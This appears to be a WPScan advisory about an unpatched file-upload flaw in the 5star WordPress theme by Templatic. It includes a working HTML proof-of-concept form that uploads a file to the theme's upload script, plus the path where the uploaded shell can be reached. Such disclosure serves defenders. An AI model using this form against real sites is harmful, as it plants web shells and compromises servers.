logoWordPressPluginsThemesAPISubmitContact
search-icon
logo
search-icon
WordPressPluginsThemesAPISubmitContactSecurity Scanner
Register

5star by Templatic - CSRF File Upload

Description

The 5star WordPress theme was affected by a Templatic Theme CSRF File Upload security vulnerability.

Proof of Concept

<html>
<body>
<center>
<form method="post" enctype="multipart/form-data" action="https://example.com/wp-content/themes/5star/Monetize/general/upload-file.php">
<input name="uploadfile[]" type="file" />
<input type="submit" value="upload" />
</form>
</center>
</body>
</html>

File Access: https://example.com/wp-content/themes/5star/images/tmp/your_shell.php

Affects Themes

5star

No known fix

References

URL

https://en.0day.today/exploits/22091

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CWE-352

Miscellaneous

Original Researcher

Jje Incovers

Verified

No

WPVDB ID

80537e03-34fd-47c7-8a8c-6002b109a726

Timeline

Publicly Published

2014-08-01 (about 7 years ago)

Added

2014-08-01 (about 7 years ago)

Last Updated

2021-01-13 (about 1 years ago)

Our Other Services

WPScan WordPress Security Plugin